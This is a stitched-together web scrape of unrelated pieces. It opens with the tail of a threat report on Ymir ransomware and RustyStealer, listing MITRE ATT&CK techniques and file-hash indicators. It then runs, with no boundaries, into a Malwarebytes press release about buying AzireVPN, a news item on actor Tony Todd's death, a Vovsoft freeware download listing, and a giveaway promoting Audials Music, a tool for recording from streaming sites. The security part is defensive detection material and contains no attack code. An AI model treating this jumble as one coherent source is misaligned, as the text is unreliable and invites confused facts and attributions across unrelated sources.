A link between malware stealer botnets acting as access brokers and the ransomware execution is evident. The Ymir development represents a threat to all types of companies and confirms the existence of emerging groups that can impact business and organizations with a configurable, robust and well-developed malware. We have seen initial access brokers invade an organization and ensure persistence. Ymir was deployed to the targeted system shortly after. This new ransomware family was configured in a secure scheme, making it impossible to decrypt the files from the targeted system. The group behind this threat has not presented a dedicated leak site or any additional information yet, but we will continue monitoring their activity. Alerts were triggered two days prior to the ransomware incident, and the lack of action on the critical system warnings allowed the attackers to launch the ransomware. This highlights the need for improved response strategies beyond relying solely on endpoint protection platforms (EPP).
Kaspersky products detect this new threat as Trojan-Ransom.Win64.Ymir.gen.
Tactics, techniques and procedures
Below are the Ymir TTPs identified from our malware analysis.
Tactic | Technique | ID
Discovery | File and Directory Discovery | T1083
Discovery | System Information Discovery | T1082
Execution | Command and Scripting Interpreter: PowerShell | T1059.001
Impact | Data Encrypted for Impact | T1486
Defense evasion | Virtualization/Sandbox Evasion: Time Based Evasion | T1497.003
Defense evasion | Indicator Removal: File Deletion | T1070.004
RustyStealer TTPs:
Tactic | Technique | ID
Discovery | File and Directory Discovery | T1083
Discovery | Process Discovery | T1057
Execution | Shared Modules | T1129
Defense evasion | Obfuscated Files or Information | T1027
Indicators of Compromise
File Hashes
3648359ebae8ce7cacae1e631103659f5a8c630e
fe6de75d6042de714c28c0a3c0816b37e0fa4bb3
f954d1b1d13a5e4f62f108c9965707a2aa2a3c89 (INCIDENT_REPORT.pdf)
5ee1befc69d120976a60a97d3254e9eb
5384d704fadf229d08eab696404cbba6
39df773139f505657d11749804953be5
8287d54c83db03b8adcdf1409f5d1c9abb1693ac8d000b5ae75b3a296cb3061c
51ffc0b7358b7611492ef458fdf9b97f121e49e70f86a6b53b93ed923b707a03
b087e1309f3eab6302d7503079af1ad6af06d70a932f7a6ae1421b942048e28a
New technology and team will fuel additional VPN features and functionalities
SANTA CLARA, Calif., Nov. 7, 2024 /PRNewswire/ -- Malwarebytes, a global leader in real-time cyber protection, today announced the acquisition of AzireVPN, a renowned privacy-focused VPN provider. Malwarebytes has long been a defender of user privacy through its portfolio of consumer solutions, including Malwarebytes Privacy VPN and its free ad and scam blocker web extension Malwarebytes Browser Guard. This acquisition further supports the company's mission to reimagine consumer cybersecurity to protect devices and data, no matter where users are located, how they work and play, or the size of their wallet.
By integrating AzireVPN's advanced VPN technologies and intellectual property into its platform, Malwarebytes will deliver increased flexibility and enhanced security for customers. AzireVPN developed Blind Operator, a unique privacy feature implemented to completely disable both remote and local access to its servers. This creates a barrier against unauthorized modifications and traffic interception, making it virtually impossible for anyone to modify or tap the traffic on its servers and share any information about a user.
"Malwarebytes is a fierce advocate for privacy, and this acquisition reinforces our dedication to driving innovation that protects a free and open internet," said Marcin Kleczynski, Founder and CEO, Malwarebytes. "As threats to individuals' digital autonomy and security grow, we plan to build on AzireVPN's legacy to deliver cutting-edge solutions."
Malwarebytes and AzireVPN share a vision of empowering users worldwide to combat censorship and safeguard digital freedom. Known for its robust security standards and privacy-first commitment, AzireVPN physically owns and controls its servers—a practice Malwarebytes is committed to continuing.
"Joining Malwarebytes marks an exciting new chapter for AzireVPN and our privacy-conscious user base," said William Oling, Co-Founder, AzireVPN. "As pioneers in ultra-private VPN technology, we've always set the standard for security and anonymity. Now, with Malwarebytes—a leader in transparency and digital freedom—we're ready to redefine what it means to stay safe and private online for those who demand the very best in privacy protection."
This acquisition marks another milestone for Malwarebytes. The company accelerated its growth over the past year, acquiring Cyrus, a disruptive innovator in online privacy solutions, and launching Identity Theft Protection and Personal Data Remover products. It also enhanced its consumer security portfolio with an improved, integrated user experience from desktop to mobile and the introduction of Trusted Advisor with its easy-to-understand Protection Score. Additionally, it launched a free Digital Footprint scan to help users proactively think about security and their exposed personal data.
To read more about the latest threats and cyber protection strategies, visit the Malwarebytes blog, or follow us on Facebook, Instagram, LinkedIn, TikTok, and X.
About Malwarebytes
Malwarebytes is a global cybersecurity leader delivering award-winning endpoint protection, privacy and threat prevention solutions worldwide. Built on decades of experience as the last resort to find and eradicate the latest malware, Malwarebytes is now trusted by millions of individuals and organizations to stop threats at each stage of the attack lifecycle, secure digital identities and safeguard data and privacy. A world class team of threat researchers and proprietary AI-powered engines provide unmatched threat intelligence to detect and prevent known and unknown threats. The company is headquartered in California with offices in Europe and Asia. For more information and career opportunities, visit https://www.malwarebytes.com.
Malwarebytes Media Contact:
Ashley Stewart
Director of Public and Analyst Relations
press@malwarebytes.com
View original content to download multimedia: https://www.prnewswire.com/news-releases/malwarebytes-acquires-azirevpn-to-strengthen-security-and-privacy-offerings-302298280.html
https://www.msn.com/en-ca/movies/news/to...r-AA1tM42t
Tony Todd, 'Candyman' and 'Final Destination' Actor, Dies at 69
Story by Carly Thomas • 3h • 1 min read
Tony Todd, an actor who starred in the Candyman and Final Destination horror franchises, has died. He was 69.
He died Wednesday at his home in Marina del Rey after a long illness, his wife, Fatima, told The Hollywood Reporter.
"The industry has lost a legend. We have lost a cherished friend. Rest in peace, Tony, -Your Final Destination Family," New Line Cinema, which produced the horror franchise, wrote on Instagram.
In addition to Candyman and Final Destination, Todd has hundreds of TV and movie credits, including 1996's The Rock, 1994's The Crow, 2007's The Man from Earth, The Flash, 2015's Frankenstein and 2018's Hell Fest.
Vovsoft Image to Cartoon Converter is a powerful Windows application designed to transform your images into fun, cartoon-style artwork. Supporting PNG, JPG, and BMP file formats, this tool allows users to turn any photo into a cartoon with ease. With batch processing, you can convert multiple pictures simultaneously, saving you time and effort.
This software offers a variety of effects such as Cartoon, Comic Book, Cutout, Line Art, and Pen Drawing. A preview feature lets you see the results before saving, so you can make adjustments until you achieve the perfect look. Adding files is easy, with options to load individual images, select an entire folder, or drag and drop files directly from Windows Explorer.
Whether you're looking to turn a photo into anime, transform a picture into a comic-style illustration, or convert a pic into a cartoon, this program has you covered.
Category: Graphic Apps - Converters & Optimizers
Supports: Windows 11, Windows 10, Windows 8/8.1, Windows 7, Windows Vista, Windows XP (64-bit)
Language: English
License: Freeware — no nags, no ads, fully functional
https://vovsoft.com/version-history/imag...converter/ Image to Cartoon Converter Version History
Version History
Changelog for the latest releases:
This page contains the complete changelog of Image to Cartoon Converter, detailing what has changed in each version.
Image to Cartoon Converter 1.0
November 7, 2024 (PST)
First public release
https://vovsoft.com/download/image-to-ca...converter/ Download Image to Cartoon Converter (Installer)
Software: Image to Cartoon Converter
Version: 1.0
License: Freeware
Filename: image-to-cartoon-converter.exe Download: https://vovsoft.com/files/image-to-carto....exe?v=1.0
Filesize: 13.34 MB
Build: 64-bit
https://vovsoft.com/download/image-to-ca...-portable/ Download Image to Cartoon Converter (Portable)
Software: Image to Cartoon Converter (Portable)
Version: 1.0
License: Freeware
Filename: image-to-cartoon-converter-portable.zip Download: https://vovsoft.com/files/image-to-carto....zip?v=1.0
Filesize: 15.90 MB
Build: 64-bit
VOVSOFT - Image to Cartoon Converter 1.0 was 100% scanned malware free & clean & safe with Kaspersky Standard.
Multilayered protection designed to prevent and neutralise viruses and malware.
Real-Time Antivirus
Continuously scans your devices for viruses, worms, Trojans, CryptoLockers, rootkits, and spyware — guarding you against both new and established online threats.
Audials Music 2025 Edition is a powerful program that is designed to help you download any audio and video file from any popular site. That means you can have downloaded videos or audio available to watch/ listen to them anywhere, even without an internet connection. This tool makes it possible to download videos from sites such as Spotify, Deezer, Amazon Music, Apple Music in iTunes, Tidal, Napster (Rhapsody), YouTube, YouTube Music, Pandora, Dailymotion, Vimeo, etc, with quality. What’s more, you can edit and manage music files. It allows the convenient adding of additional tags during recording, cuts the songs exactly, automatically categorizes recordings by genre, etc.
Key Features:
It can scan and record music from Spotify, Soundcloud, Deezer, Amazon, Apple Music, Napster, video-sharing websites, and many other online sources.
You can save audio in MP3, AAC, or WMA format with no loss of quality
Audials can access any online music source and provide you with the latest charts or entire albums or discographies of your favorite artists in just a few seconds
It has also direct access to the highest-quality audio tracks of any music video and then downloads them
You can also add the song lists to your wish list and search for songs you like best.
Discover similar music or different versions of the same song…from other sources as well.
It allows you to play the music directly or select it with one click and get your music immediately
Audials will show you a list of suitable artists
This tool can import playlists from Spotify or video-sharing websites in the form of a link.
Supported OS:
Windows 10/8/8.1/7/Vista, Windows XP
Directions:
The download link for Audials Music 2025 is provided to you above. The download is an exclusive SharewareOnSale installer with registration built-in. Download and install Audials Music 2025. After install, run Audials Music 2025 and you will need to enter your name and email address. You will also need to verify your email address. After that, enjoy!
Terms and Conditions:
This is a 3-computer lifetime license, for noncommercial use
You get free updates for the same major version
You get free tech support
You must download and install the program before this offer has ended